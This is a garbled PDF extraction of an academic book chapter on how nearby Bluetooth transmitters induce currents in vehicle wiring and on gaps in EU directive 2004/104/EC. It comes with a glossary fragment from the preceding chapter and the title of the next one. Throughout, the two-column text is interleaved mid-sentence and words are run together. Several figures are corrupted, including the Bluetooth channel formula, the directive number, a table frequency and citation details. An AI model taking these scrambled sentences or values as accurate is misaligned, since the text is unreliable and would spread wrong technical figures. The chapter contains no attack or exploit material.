wireless networking of portable and mobile com- service of a telecommunications resource, protocol,
puting devices such as PCs, PDAs, peripherals, cell or product.
phones, pagers, and consumer electronics, allowing
Secure Shell or SSH: A set of standards and
these devices to communicate and interoperate with
an associated network protocol that allows estab-
one another. The IEEE Project 802.15.1 has derived
lishing a secure channel between a local and a
a wireless personal area network standard based on
remote computer. It uses public-key cryptography
theBluetoothv11Foundation . Specifications.
to authenticate the remote computer and to option-
IPsec: IPsec (IP security) is a suite of protocols ally allow the remote computer to authenticate the
for securing Internet protocol communications by user.SSHprovidesconfidentialityandintegrityof
encrypting and/or authenticating each IP packet data exchanged between the two computers using
in a data stream. IPsec also includes protocols for encryption and MACs.
cryptographic key establishment. There are two
Throughput: The amount of digital data per
modes of IPsec operation: transport mode and
time unit that are delivered to a certain terminal
tunnel mode. IPsec is implemented by a set of
in a network, from a network node, or from one
cryptographicprotocolsforsecuringpacketows. fl
node to another, for example, via a communica-
Specifically,the authentication header (AH) pro-
tion link.
tocol provides authentication, payload (message),
0

Chapter XLII
Bluetooth Devices Effect on
Radiated EMS of Vehicle Wiring
Miguel A. Ruiz
University of Alcala, Spain
Felipe Espinosa
David Sanguino
AbdelBaset M.H. Awawdeh

AbstrAct
The electromagnetic energy source used by wireless communication devices in a vehicle can cause elec-
tromagnetic compatibility problems with the electrical and electronic equipment on board. This work
is focused on the radiated susceptibility (electromagnetic susceptibility [EMS]) iss
methodforquantifyingtheelectromagneticinfluenceofwirelessradiofrequency(RF)tran
boardvehicles.Thekeytotheanalysisistheevaluationoftherelationbetweentheel
by a typical Bluetooth device operating close to the automobile’s electrical and electronic systems and
thefieldlevelspecifiedbytheelectromagneticcompatibility(EMC)directive204/1ECforradia
susceptibility tests. The chapter includes the model of a closed circuit structure emulating an automobile
electricwiresystemandthesimulationofitsbehaviourunderelectromagneticfield
to this a physical structure is designed and implemented, which is used for laboratory tests. Finally,
simulated and experimental results are compared and the conclusions obtained are discussed.
IntroductIon And bAckground contrasted. The increasing use of radio frequency

transmitters by automobile users makes it neces-
In the current vehicle coexist electronic and com- sary to evaluate the risk caused by the coexistence
munications systems whose advantages are clear of information and communication technologies
for the user but whose possible problems are not in the reduced space inside the vehicle. In this
Bluetooth Devices Effect on Radiated EMS of Vehicle Wiring
context, the present work appears in order to bring Taking advantage of the trend towards the use
up methods and results that contribute to establish- of DC voltage supplies of 36-42 volts instead of
ing the possible risks limit of the use of wireless the 12-14 volts currently used, an increase in elec-
devices inside the automobile, and more precisely tronics is being adopted to control key elements of
those based on Bluetooth technology. the automobile such as the steering, braking, and
To centre the problem, it is mentioned the acceleration. For example, the car uses a range of
tendencies in the automobile field that electricbet for the
actuators and also has an innovative driver
incorporation of new electrical and electronic sys- interface. The driver has all the vehicle functional-
tems (X-by-Wire technology) (Leen & Hefferman, ity in a special steering wheel, which is used for
2002; Mazo, Espinosa, Awawdeh, & Gardel, 2005) acceleration and braking as well as for steering
front of the current mechanical systems, aspects of and gear shifting. The vehicle uses a conventional
automotive electromagnetic compatibility (EMC) engine for propulsion but electromechanical ac-
standard 2004/104/EC (2004) for evaluation of tuators for braking, clutching, and gear shifting
susceptibility/immunity in vehicles are detailed, (Larses, 2003).
itisjustifiedtheinteresttofocusthe Withstudy onthe
the progress of X-by-Wire technology,
extended Bluetooth wireless communication tech- in-vehicledatatrafficisalwaysgrowing. - Conven
nology. However there are nonregulated questions tionally, individual wire harnesses were used for
by the 2004/104/EC concerning the use of Bluetooth data transfers between control units and their as-
devices what rise uncertainties around the risk sociated sensors or display devices. As the number
derived from its use. of control units and associated devices increase,
To get a better knowledge of this issue, we the number of wire harnesses and interconnec-
lay a few questions regarding the increase of the tions required is swelling. The in-vehicle local-area
electronic equipment role in the automobile, the network (controller area network [CAN], local in-
characteristics of commercial Bluetooth devices, terconnect network [LIN], and FlexRay) provides
some notes about the EMC European Directive an answer to this problem: it minimises the use of
involved in vehicles, and last but not least, some of individual wire harnesses for data exchanges and
the directive gaps concerning Bluetooth wireless reduces both interconnections and vehicle weight,
devices in this context. trying to improve consumption, power, security,
and comfort.
the Increase in Electrical and However, associated with these electronic
Electronic components in and communication innovations new sources of
Automobiles potential equipment failure appear, leading to the
necessity to continue working on both diagnosis
It is clear that nowadays on board electronic com- and prognosis in the automotive sector.
ponents play an important role on vehicles (Ban-
natyne, 2000; Leen & Hefferman, 2002; Mazo et bluetooth devices and Applications in
al., 2005), as much for the increase in the number Automobiles
of electronically controlled units (ECUs) as for the
complexity of the communication system Thefield
( presence of radio frequency transmitters in
buses) implemented. automobiles as a way for multiple wireless com-
Continuous development in the industrial auto- munication appliances continue to grow. Apart
mobile sector means that dynamic systems that have from the well known uses for the assistance and
traditionally been of a mechanical and hydraulic entertainment (GPS, laptops, PDAs, digital cameras,
nature, such as the steering, braking, and accelera- portable multimedia devices CD/DVD, etc.), others
tion are being replaced by electronic ones, which suchasremotediagnosis,trafficcontrol, - accidenta
leads to the proposal of networks such as X-by-Wire sistance, and so forth are being promoted (Campos,
with its own protocol (Mazo et al., 2005). Mills, & Graves, 2002; Mazo et al. 2005).

There are several wireless technologies (WiFi, Bluetooth technology, where a logic 1 level is rep-
DSRC, Zigbee, etc.) available to automobile manu- resented by a positive frequency shift and a logic 0
facturers and users, but at present the most widely level is represented by a negative frequency shift.
used is Bluetooth. Although the functionality and Keeping all this in mind, a Bluetooth transmitter,
operativity of each technology is different, they from an EMC viewpoint, can be considered as
have in common the incorporation of a transmitter an interfering RF source in the 2.4 to 2.4835 Ghz
or an electromagnetic energy source in the environ- frequency band.
ment in which they operate. This extra energy can Two levels of Bluetooth technology application
cause any kind of failure on equipment situated can be considered inside an automobile: Bluetooth
close to the transmitter, as is the case of ECUs on integrated into the vehicle at a system level and
board a vehicle where the driver introduces several Bluetooth at a user device level. From a user device
wireless devices. At the same time, the metal cage level point of view, Bluetooth technology allows
ofthevehiclecanactasaconcentrating reflector,
connecting inside the vehicle electronic mobile
amplifying radio frequency (RF) density emit- devices such as PDAs, laptops, GPSs, handsfree
ted by different radiation sources to higher and sets, or cell phones, as seen in Figure 1.
potentially more dangerous levels. The concept of ‘Bluetooth integrated into the
Bluetooth is an open technology that works vehicle at a system level’ is used when a Bluetooth
with low power and is designed for short range network can provide a functionality and versatility
(10 m-100 m), leading to being widely used in similar to a vehicle control cabled network (e.g.,
transport applications in general and in automobiles CAN bus) which is nowadays the most widely
in particular. The operating frequency range is extended solution (network and protocol) in ve-
withintheindustrial,scientific,andhicles. medical(ISM)
bandwidth used of 2.4 GHz to 2.4835 GHz. The
frequency range is divided into 79 individual RF directive 2004/104/cE for the
channels, each one separated by 1MHz. The output Assessment of EMc in vehicles
levels are divided into three classes (SIG, 2006):
class I (100 mW, +20 dBm), class II (2.5 mW, +4 In Europe, EMC activity in automobiles is regu-
dBm) and class III (1 mW, 0 dBm). lated by the recent directive on electromagnetic
The equation that determines the frequency for
each one of the channels is as follows:
Figure 1. Typical applications of Bluetooth in
F(MHz)=2+40 k where, k =….0 87 . vehicles
In order to comply with out of band regula-

tions in each country, a lower guard band of 2
MHz and an upper guard band of 3.5 MHz are
used. The protocol uses a spread spectrum, or in
other words, the transmission frequency changes
randomly 1,600 times per second, reducing this
way the possible interferences created by different
transmitters working at the same time in the same
frequency range.
Equipments transmit and receive using a time
division multiplex (TDM). In addition, spread
spectrum TDM provides a higher degree of secu-
rity against eavesdropping and provides resilience
to ambient noise. GFSK modulation is used in

compatibility (2004/104/EC EMC, 2004), which radiated susceptibility test

since July 1, 2006, substitutes the earlier directive According to Iso 11452-2
(95/54/EC EMC, 1995). The new directive requires
tests to be carried out at both component level and The before mentioned ISO 11452-2 describes a
on the vehicle as a whole. The range of required possible method for the radiated immunity test
tests includes broadband and narrowband radiated accepted by the EMC directive (2004/104/EC
emissions (CISPR 12, 2001; CISPR 25, 2002; Kerry, EMC,for
)0 2 4 thefulfilmentofelectromagnetic
2003), radiated susceptibility (ISO 11452-2, 2004), immunity requirements of electric and electronic
as well as conducted susceptibility and emissions components on a vehicle.
along supply lines of electrical and electronic Following the standard, the electromagnetic
subcomponent (ISO 7637-2, 2004). susceptibility (EMS) test must be done in a semi-
The present article focuses on the radiated anechoic chamber. The electromagnetic field
susceptibility test in accordance with regulation is generated by an antenna connected to a RF
ISO 11452-2 as this test allows determining the amplifier. To monitor the electric field intensit
electromagnetic immunity of a device or electronic level (V/m) inside the semianechoic chamber, an
component on board the vehicle in proximity to isotropic probe must be used.
RF transmitters. Figure 2 shows the setup as explained in the
standard for the radiated test on a vehicle device
Figure 2. Setup of the radiated susceptibility test

(equipment under test [EUT]). A metallic (copper from different wireless devices, the following
or galvanised steel) ground plane of a minimum of observations remain to be made:
0.5 mm thickness and 1000 x 2000 mm (WxL) area
has to be located 900±10mmabovetheoor. fl • Thespecificationsoftheradiated - susceptibi
Each one of the power supply cables must be ity test, mentioned in the directive using the
connectedtotheEUTthroughanartificialnetwork semianechoic chamber method to carry it
(AN) [5] of 5 µH/50 Ω to get a reference impedance out, determine that the range of frequencies
(usually 50 Ω). The ANs should be placed over the to be tested is from 20 MHz to 2000 MHz.
ground plane and connected to it. Therefore, the directive does not make it
The electric or electronic equipment under test compulsory to test electrical and electronic
has to be placed on a dielectric material [7] of low automobile equipment at frequencies higher
permeability (er ≤ 1.4) and 50±5 mm thickness. than 2 GHz. Bluetooth works at frequencies
One of the EUT faces has to be placed 200±10 between 2.400 and 2.4835 GHz, and hence
mm from the edge of the ground plane. The cables an electronic subsystem or component that
connected to the EUT are exposed along 1500±75 complies with the directive does not guarantee
mm to the electromagnetic radiation generated by electromagnetic compatibility in the presence
the antenna. They are placed on the same dielectric of a Bluetooth device.
material as the EUT 100±10 mm away from the • The electrical field levels specified by the
edge of the ground plane. directive to be tested in the 20 to 2000 MHz
The antenna that generates the electric range are field
of 30 V/m for 90% of the frequency
has to be located at a 100±10 mm height above the band and 25 V/m for the whole frequency
groundplane,thatismm 0 1 abovetheoor fl and band. It is foreseeable that in the near future
also 1000 ± 10 mm away from the EUT cables. thedirectivewillbemodifiedtoincreasethe
The test procedure can be divided in two range of frequencies to at least include the
steps: operating frequencies used by the wireless
devices available on the market to automobile
• A first one where the electric field level users.
calibration is done (without EUT, cables nor • The test method specified in the directive
ANs). corresponds to a situation in which the trans-
• A second in which the test is taken place mitter is not situated close to the equipment
based on the levels obtained in the preceding being studied. This leads to the use of a
step. plane wave in the test setup, which requires
one or more transmitter antenna working in
In the calibration stage, an isotropic probe 150 far field. However, in this particular case it
± 10 mm above the ground plane and 100 ± 10 mm iseasytofindBluetoothtransmitterswith
away from the edge is used. The calibration is done the automobile’s own electrical and electronic
forbothhorizontalandverticalelectric field.
system or another ones (introduced by users)
operating a few centimetres away from the
Aspects of bluetooth devices that are electronic systems and wires of the vehicle’s
not considered in directive 2004/104/ electrical installation.
Ec
With this background, the present work is
Having mentioned some of the properties of Blue- developed with the aim of determining whether a
tooth, as well as the EMC regulation applicable to device that complies with the requirements of the
the automobile context, and focusing the study on EMC automobile directive presents any possible
the assessment of the susceptibility of the electrical electromagnetic compatibility risks to Bluetooth
and electronic components on board to radiations transmitters located a short distance away. In addi-

tion a measure procedure is proposed for assessing cal-field levels of 52 V/m, which is close to the
the degree of interrelation between the electronics limit level indicated by EMC standard.
on board and the Bluetooth devices incorporated
by vehicles’ users.
ProPosEd MEtHod for
related Published works AssEssIng tHE PossIblE
EffEcts of bluEtootH dEvIcEs
In the technical literature, negative examples of usEd InsIdE vEHIclEs
vehicle-communication system interaction can
be found, as in the case of ‘Project 54’ (Kun, Taking into account previous published studies
Lenharth, & Millar, 2004), in which the origin (Schoof et al., 2003; Stadtler et al., 2002) and the
and possible solutions to random signal reception EMC specifications in the automotive context,
byappliancesnormallyusedbytraffic - police
certain of questions must be made in relation with
ficersareanalysed.Thereareothermore complex
the incorporation of Bluetooth transmitters in
cases, such as the one stated by Tatoian (2005), in automobiles by either the manufacturer or the us-
which the possibility of equipping the police with ers of the vehicle. As mentioned earlier, the EMC
electromagnetic systems in order to block cars directive (2004/104/EC EMC, 2004) does not
in conflictive traffic conditions is assessed. require radiated The susceptibility tests above 2 GHz
impact of the transient surrounding perturbations andrestrictsthefieldleveloftheequipmentun
(especially due to electromagnetic interferences) test to 25 or 30 V/m. Moreover, in present day traf-
on the dependability of systems distributed on ficconditions,itiseasytofindseveralBluetoot
TDMA-based networks in automotive domain is transmitters inside the cabin of the vehicle and
analysed in by Campos et al. (2002). within a few centimetres of the vehicle’s cables
All of this justifies the interest and of automobile
electronic systems.
manufacturers in regulating the incorporation of
new information and communication technologies.
fundament of the Proposed Measure
In Australia for example, exists the FCAI (1997)
initiative, in which the automobile industry and
The setup for the radiated susceptibility test for
the nation’s government are working together to
an automobile component in accordance with
establish the emission and susceptibility limits
ISO regulation 11452-2 (ISO 11452-2, 2004) was
to which new vehicles must conform in order to
represented in the previously in the chapter. This
guarantee the compatibility of the electronics on
setup contains similarities to the actual layout of
board the vehicle with the multimedia equipment
the components inside a vehicle. For example, the
for drivers available on the market. EMC centres
equipment under test [1], wiring [2], simulators [3],
work along the same lines in association with au-
and power supply [4], are placed on a ground plane
tomobile manufacturers such as Audi or Renault
that emulates the chassis of the vehicle. The length
(Renault, 2006).
of wire exposed to the radiation is 1.5 m, being the
On the other hand, there are several previous
usual length of cable on board a vehicle.
research works related to this subject. Stadtler
In this context, a study is made of the radio
Schoof, and Haseborg (2002) calculate that a 100
frequency current that is induced in the cable [2]
mWBluetoothtransmitterinfar-field - m)1 ( gener
when it is submitted to the action of a Bluetooth
atesaelectric-fieldlevelofV/5 42. m,thatmeansa
transmitterinnearfield,thatistosaywithafe
quite lower level to the one used in EMC test ac-
centimetres between transmitter and cable.
cording to the 2004/104/EC standard. Nevertheless,
Once the current induced in the EUT cable by
simulations results presented by Schoof, Stadtler,
the Bluetooth transmitter has been determined, the
and Haseborg (2003) inside a cockpit vehicle with
electrical field level that must be applied dur
a 100 mW Bluetooth transmitter achieved electri-

the radiated susceptibility test in order to induce the transmission frequency of the device is used to
a current value identical to that induced by the measure the induced current. The resistance of 50
Bluetooth transmitter a few centimetres away Ω that corresponds to the EUT is provided by the
is analysed. If the electric field level required
spectrum toinput; as an impedance of 50 Ω
analyser
induce the current value is under the 25 or 30V/m at the other end of the cable, a load 50 Ω with an
specifiedby/04EC1 /042 EMC,itwillconfirmthat N connector is used. The analyser will register the
allequipmentthatfulfiltheEMCdirective should
voltage value at its input terminals and by direct
not present compatibility problems. However, if relation the value of current induced in the cable
theelectricfieldlevelissimilarto isor higherthan
determined.
the one specified by EMC directive, there is no
guarantee that the automotive component will not design of the Interference Pattern
have electromagnetic compatibility problems in
close proximity to a Bluetooth transmitter. An electromagnetic radiation source in the 2.400
to 2.483 GHz range has been designed with adjust-
able power between 1 and 100 mW, emulating the
PrActIcAl IMPlEMEntAtIon And behaviour of class I, II, and III Bluetooth transmit-
rEsults ters. The radiation source consists of an antenna
connected to a R&S SMR20 RF generator. The
Following the guidelines indicated by Stadtler et al. antenna design is based on a commercial radio
(2002), the setup shown in Figure 3 is used for the frequency module (SparkFun, 2005), simulated
present research work. The impedance presented using FEKO and implemented on a PCB.
by the EUT [1] between the cable and the ground
plane [6] is modelled as an ideal impedance of 50 Elements of the setup
Ω. At the other end of the cable an ideal imped-
ance of 50 Ω represents the one corresponding Figure 4 shows the setup used to measure the
to the artificial network [5] or to other currentauxiliary
induced in the cable when the Bluetooth
equipment. transmitter is situated a short distance away. The
Inthefirstapproachatvalidatingthe right proposed
hand side of the cable is loaded with an im-
thesis the electromagnetic simulation tool FEKO pedance of 50 Ω, while the impedance of 50 Ω
(2005) is used. In the laboratory experimental phase, on the left hand side is provided by the spectrum
a R&S ESIB 26 spectrum analyser syntonised to analyser input (R&S ESIB 26), which is outside
Figure 3. Setup diagram of the test used to determine the current induced by a transmitter in near
field

the semianechoic chamber (Space Saver of ETS) (FP6001 AR) placed at a height of 10 cm above
during the test and is connected by means of an the ground plane and 10 cm from the edge facing
RG214 cable. The attenuation caused by the RG214 the antenna. The value of the current induced by
cable is corrected by the spectrum analyser. the radiation of the AT4000 AR antenna situated
To measure the induced current, the radiation at a distance of 1 m is constantly measured on the
source is placed in different positions with respect spectrum analyser. The power transferred to the
to the 1.5 m long cable. The measurements are antenna is varied until the induced current values
made with the transmitter facing the cable and in are identical to those obtained when the Bluetooth
various positions along its length. The transmit- transmitter was situated a few centimetres from
ter is placed at distances of 2 cm, 5 cm, and 8 cm the same cable. This is the way to determine the
from the cable and at heights with respect to the electric field level that induces the same curr
ground plane of 0.6 cm and 3.7 cm. as a Bluetooth transmitter in the conditions previ-
To determine the value of the electric field
ously described.
intensity (V/m), the setup represented in Figure 4
is used, corresponding to the radiated susceptibil- results
ity test for automobile components (2004/104/EC
EMC,.The
)0 2 4 electricfieldlevelisregistered In the following section, some of the results about
by means of an isotropic electric-field probe
the setups proposed in previous sections obtained
by both simulations and practical measurements
made in the laboratory are given, with the principal
aim of determining the electromagnetic compat-
ibility risks caused by commercial Bluetooth
Figure 4. Setup of the test used to measure the transmitters in automobiles.
current induced by a transmitter in near The FEKO field
tool is used to simulate a ground
(top). Setup used to determine the electric field
plane with a 150 cm cable above it at a height of 5
level (down) cm, with both ends loaded with a resistance of 50
Connecting spectrum Load 50 Ω
Ω. A monopole antenna connected to a generator
analyzer (EUT) was used as a transmitter in the simulation. The
simulations are made with the antenna transmitter
situated in the centre of the 1.5 m cable structure
and at distances of 2 cm, 5 cm, and 8 cm and at
heights above the ground plane of 0.6 cm and 3.7
Antenna and RF cm. In addition, the simulations are carried out
generator
(Bluetooth TX
Cable under taking into account the different power types (I, II,
test
simulated) andIII)specifiedbytheBluetoothtechnology.
Tables 1 and 2 represent a comparison between
Electric-field the results obtained with the FEKO simulation
probe
tool and those obtained in laboratory tests. First
of all, the results belong to a transmitter working
at 2.425 GHz and at a height above the ground
plane of 0.6 cm are presented. The table shows
the variation in the induced current as a function
of the distance that separates the transmitter from
Transmitter
antenna
the cable, and for three different power transmis-
sion (+20, +4, and 0 dBm). For example, in case
the class I transmitter is separated a distance of
2 cm from the cable, the simulated current value

is 1990 µA in contrast with the value of 1870 µA located at a distance of 2 cm and 5 cm from the
experimentally obtained. cable, and at a height above the ground plane of
Besides, one can see in Table 2 the comparison 0.6 cm. The same table shows the increase in the
between simulated and experimental induced cur- induced current due to the effect of different power
rent when the emission frequency is changed for class transmitter (class I, II, and III).
three Bluetooth devices (class I, II, and III) at a Toconclude,Figure5showstheelectricfield
distance of 5 cm and a height of 0.6 cm. levels that the structure being tested is submitted
On the other hand, Table 3 shows some of the to in order to induce the same RF currents as those
measurements obtained in the laboratory corre- produced if a Bluetooth transmitter is situated in
sponding to the current induced by the transmitter near field. The setup used for the test is the one
Table 1. Values obtained by simulation and experimentally of the induced current as a fun
transmitterdistance.(frequency245MHzandheight0.6cm)
Wire Induced Current
Power transmission Distance
Simulation (µA) Measurement (µA)
Bluetooth devices (cm)
2 1990 1870.0
+20 dBm
5 879 715.3
(Class I)
8 337 378.0
2 315 319.5
+ 4 dBm
5 139 123.0
(Class II)
8 53.3 62.2
2 200 203.4
0 dBm
5 87.7 78.8
(Class III)
8 33.5 43.3
Table 2. Values obtained by simulation and experimentally of the induced current as a fun
transmitterfrequency(distance5cmandheight0.6cm)
Induced Current
Power transmission Frequency
Simulation (µA) Measurement (µA)
Bluetooth devices (MHz)
2400 921 827.0
+20 dBm 2425 879 715.3
(Class I) 2450 941 604.0
2475 1060 645.0
2400 145 142.8
+ 4 dBm 2425 139 123.0
(Class II) 2450 148 104.8
2475 167 111.7
2400 91.1 90.8
0 dBm 2425 87.7 78.8
(Class III) 2450 93.8 67.5
2475 105 71.28

Table 3. Measurement of the induced current as a function of the frequency and of the Bluetooth trans-
mitterlocation(height0.6cm)
Measurement of induced current

Power transmission Frequency Distance 2 cm Distance 5 cm
Bluetooth devices (MHz) (µA) (µA)
2400 1974 827.0
+20 dBm 2425 1870 715.3
(Class I) 2450 1772 604.0
2475 1862 645.0
2400 335.7 142.8
+ 4 dBm 2425 319.5 123.0
(Class II) 2450 301.6 104.8
2475 331.5 111.7
2400 213.3 90.8
0 dBm 2425 203.5 78.8
(Class III) 2450 193.0 67.5
2475 203.0 71.28
FigureIdentical
5. inducedcurrentonthecableundertestbytheintensity - ofelectricfie
ing to the described test as well as Bluetooth transmitters working with variable distance and power
(dBm)
0
shown in Figure 4 (down). For example, a class I radiated susceptibility test according to a valid
transmitter (+20 dBm) located at a distance of 5 EMC directive for automobiles.
cm and at a height of 0.6 cm induces a current of In short, more consideration should be given
715 µA. In the same way, this transmitter situated to the electromagnetic interference generated by
at a distance of 2 cm induces a current of 1870 Bluetooth devices as they get closer to electrical
µA. Identical current values are induced when the and electronic circuits whose performance they
wire loaded by resistances of 50 Ω is exposed to a can affect, and even more so in confined spaces
uniformplanewavewithanelectricfield where level
multipleof sources of interference coexist,
42.3 V/m and 122 V/m, respectively. as is the situation with automobiles. The effect of
increasing the power of the transmitter or reducing
the distance between it and the wired elements of
futurE works the automobile is equivalent to submitting them to
increasingelectricfar-fieldlevels - inradiated
Once the above shown results are analyzed, the ceptibility tests in accordance with the 2004/104/
authors suggest to keep on evaluating the elec- EC EMC directive, which increases the risk of a
tromagnetic field generated from these kinds
failure in the system.
of wireless communication devices and others This work leads to support the need for the
alike, varying the setup conditions (relative cable prevailingEMCdirectivetobemodifiedinorder
and antenna location, cables, different antennas to assess and ensure the electromagnetic compat-
transmitting simultaneously, etc.). All this is done ibility of automobiles’ on board systems in the
comparing the results obtained from the simulation presence of wireless devices with a frequency
tools as well as from the experimental tests in the range above 2.0 GHz.
EMC laboratory.
It would also be interesting to study and evaluate
the amplifying effect due to the metallic structure AcknowlEdgMEnt
of the cabin, measuring inside and outside the
vehicle. This work has been possible thanks to the support of
the Centre of High Technology and Homologation
(CATECHOM) at the University of Alcala (UAH),
conclusIon as well as the COVE Project funded by the Spanish
Science and Education Ministry TRA2005-05409/
From the simulated and experimental results AUT and TRA2006-12105/TAIR.
obtained by this work, it can be deduced that the
electromagnetic interference supported by the
cable structure under study, when situated a few rEfErEncEs
centimetres from a commercial Bluetooth transmit-
ter, is similar to the action of a plane wave with 2004/104/EC EMC. (2004). Directive relating to
electricfieldlevelssuperiortothose specified
the radio by of vehicles. Commission of
interference
directive 2004/104/EC (25 or 30 V/m). the European Communities.
Comparingthemagnitudeoftheelectricfields
95/54/EC EMC. (1995). Directive relating to the
obtained in the present analysis with the real
radio interference of vehicles. Commission of the
values at which on board electronic components
European Communities.
are tested in accordance with the EMC directive,
it can be deduced that Bluetooth transmitters of Bannatyne, R. (2000, May). The sensor explosion
20 dBm can cause electromagnetic susceptibility and automotive control systems. Sensors Maga-
problems in the vehicle’s electronic and electrical zine, 17(5).
systems, which would not be detected during the

Campos, F.T., Mills, N.W., & Graves, M.L. (2002). Larses, O. (2003). Modern automotive electron-
A reference architecture for remote diagnostics ics from an OEM perspective (Tech. Rep. KTH
and prognostics applications. In Proceedings of S-100 44). Royal Institute of Technology, Me-
the IEEE Autotescon (pp. 842-853). chatronics Lab, Department of Machine Design,
Stockholm.
CISPR 12. (2001). Vehicles, boats and internal
combustion engine driven devices. Radio dis- Leen, G., & Hefferman, D. (2002, January).
turbance characteristics. Limits and methods Expanding automotive electronic systems. IEE
of measurement for the protection of receivers Computer,5(1), 3 88-93.
except those installed in the vehicle/boat/device
Mazo, M., Espinosa, F., Awawdeh, A.M.H., &
itself or in adjacent vehicles/boats/devices. The
Gardel, A. (2005). Automotive electronics diag-
International Special Committee on Radio Inter-
nosis: State of the art and next tendencies. FITSA.
ference (CISPR).
Madrid. Retrieved October 15, 2007, from http://
CISPR 25. (2002). Radio disturbance characteris- www.fundacionfitsa.org/fitsa/pub/ Libro%02diag
tics for the protection of receivers used on board nosis%20electronica.pdf
vehicles, boats, and on devices. Limits and methods
Renault. (2006). Renault EMC unit. Aubevoye,
of measurement. The International Special Com-
France. Retrieved October 15, 2007, from
mittee on Radio Interference (CISPR).
http://www.worldcarfans.com/news.cfm/new-
FCAI. (1997). Federal Chamber of Automotive sid/2060406.004/country/ecf/Renault-inaugu-
Industries (FCAI). Retrieved October 15, 2007, rates-emc-unit
from http://www.dcita.gov.au/Article/0,,0_4-
Schoof, A., Stadtler, T., & Haseborg, J.L. (2003,
2_4008-4_10465,00.html
May 11-16). Simulation and measurement of the
FEKO. (2005). EM software & systems. FEKO. propagation of Bluetooth signals in automobiles.
Retrieved October 15, 2007, from http://www. Paper presented at the 2003 IEEE International
feko.info/ Symposium, EMC’03 (pp.1297-1300).
ISO 11452-2. (2004). Road vehicles: Component SIG. (2006). SpecificationoftheBluetooth . system
test methods for electrical disturbances from nar- Retrieved October 15, 2007, from http://www.
rowband radiated electromagnetic energy. Part 2: bluetooth.com
Absorber-lined shielded enclosure. The Interna-
SparkFun. (2005).Transceiver MiRF - Miniature
tional Organization for Standardization (ISO).
RF 2.4GHz. Retrieved October 15, 2007, from http://
ISO 7637-2. (2004). Road vehicles: Electrical www.sparkfun.com/commerce/product_info.
disturbance from conduction and coupling. Part php?products_id=13 5
2: Electrical transient conduction along supply
Stadtler, T., Schoof, A., & Haseborg, J.L. (2002,
lines only on vehicles with nominalV2 1 or V4 2
September 9-13). Electromagnetic compatibility
supply voltage. The International Organization
of a system under the influence of a Bluetooth
for Standardization (ISO).
transmitter. Paper presented at the Symposium
Kerry, P.J. (2003). EMC in the European Union. EMC Europe 2002, Sorrento.
IEEE. 0-7803-7779-6/03.
Tatoian, J. (2005). Car chases zapped. Pasadera,
Kun, A., Lenharth, W., & Millar, W.T. (2004). California: Eureka Aerospace. Retrieved October
Project 45
. Dirham: University of New Hampshire. 15, 2007, from http://www.defensetech.org/ar-
Retrieved October 15, 2007, from http://www. chives/001369.html
project54.unh.edu/

kEy tErMs CISPR: The Special International Committee

on Radio Interference(abbreviated CISPR from the
Anechoic (Semianechoic) Chamber: An Frenchnameoftheorganization,Comitéinterna -
anechoic chamber is a room in which there are no tionalspécialdesperturbationsradioélectr
echoes. This description was originally used in is concerned withdeveloping norms for detecting,
the context of acoustic (sound) echoes caused by measuring and comparing electromagneticinterfer-
reflectionsfromtheinternalsurfaces ofthe
ence room
in electric devices. CISPR's principal task is at
but more recently the same description has been the higherend of the frequency range, from 9 kHz
adopted for the radio frequency (RF) anechoic upwards, repairing standards thatoffer protection
chamber. A RF anechoic chamber is designed of radio reception from interference sources such
to suppress the electromagnetic wave analogy of aselectrical appliances of all types, the electricity
echoes: reflected electromagnetic waves, supply system,industrial, scientific
again - and electr
from the internal surfaces. Both types of chamber medical RF, broadcasting receivers (soundand
are usually built, not only with echo suppression TV) and, increasingly, information technology
features, but also with effective isolation from equipment (ITE).
the acoustic or RF noise present in the external
EMC-EMI-EMS: EMC is an abbreviation
environment. In a well designed acoustic or RF
for electromagnetic compatibility. This means
anechoic chamber the equipment under test will
interoperability, or an electronic device’s ability
only receive signals (whether acoustic or RF) which
to operate in an electric environment without
are emitted directly from the signal source, and
interfering other electronic devices (emission),
not reflected from another part of the chamber.
and without being interfered by other devices in
The semianechoic chamber is a shielded room
its vicinity (immunity).EMC is divided into two
with radio frequency absorbing material on the
main areas: electromagnetic interference (EMI)
walls and ceiling (not on the ground). This semi-
and electromagnetic susceptibility (EMS). These
anechoicchambersimulatesanopenfieldtestsite,
two areas are again divided into two categories of
and eliminates any ambient signals that may be
phenomena: conducted phenomena and radiated
presentinanopenfieldenvironment.
phenomena. EMC testing comprises measurements
Bluetooth (Class I, II, and III): Bluetooth is of the emission generated on in- and outgoing
the name of a wireless technology standard for cables, the emission generated as electric field
connecting devices, set to replace cables. It uses surrounding the device, immunity against several
radio frequencies in the 2.45 GHz range to transmit disturbance phenomena on in- and outgoing cables,
information over short distances of generally 33 immunityagainstelectricfieldsgeneratedbyothe
feet (10 meters) or less. By embedding a Bluetooth electronic devices and radio transmitters, and im-
chip and receiver into products, cables that would munity against electrostatic discharges generated
normally carry the signal can be eliminated. by human intervention.
Therearecurrentlythreeavours fl - orclassifica
Near Field Communication (NFC): A short-
tions of Bluetooth devices, relative to transmitting range wireless connectivity standard (Ecma-340,
range. As the range is increased the signal used in ISO/IEC 18092) that uses magneticdfiel induction
therespectiveclassificationisalso to stronger. Note between devices when
enable communication
that class III devices are comparatively rare. they are touched together, or brought within a
few centimetres of each other. Jointly developed
Class Signal Strength Range
byPhilipsandSony,thestandardspecifiesaway
Class I 100 mW (+20dBm) Up to 328 feet (100 meters) for the devices to establish a peer-to-peer (P2P)
Class II 2.5 mW (+4 dBm) Up to 33 feet (10 meters) network to exchange data. After the P2P network
Class III 1 mw (0 dBm) Up to 33 feet (10 meters) hasbeenconfigured,anotherwireless - communica

tion technology, such as Bluetooth or Wi-Fi, can WLAN: The acronym for wireless local-area
be used for longer range communication or for network. Also referred to as LAWN. A type of
transferring larger amounts of data. local-area network that uses high-frequency radio
waves rather than wires to communicate between
RF: Short for radio frequency, any frequency
nodes. LAN is a computer network that spans a
within the electromagnetic spectrum associated
relativelysmallarea.MostLANsareconfinedto
with radio wave propagation. When a RF current
a single building or group of buildings. However,
issuppliedtoanantenna,anelectromagneticfield
one LAN can be connected to other LANs over
is created that then is able to propagate through
any distance via telephone lines and radio waves.
space. Many wireless technologies are based on
A system of LANs connected in this way is called
RF field propagation, including cordless phones,
a wide-area network (WAN).
radar, ham radio, GPS, and radio and television
broadcasts. RF waves propagate at the speed of
light, or 186,000 miles per second (300,000 km/s).
Their frequencies however are slower than those
of visible light, making RF waves invisible to the
human eye.

Chapter XLIII
Security in WLAN
Mohamad Badra
Bât ISIMA, France
Artur Hecker
INFRES-ENST, France
AbstrAct
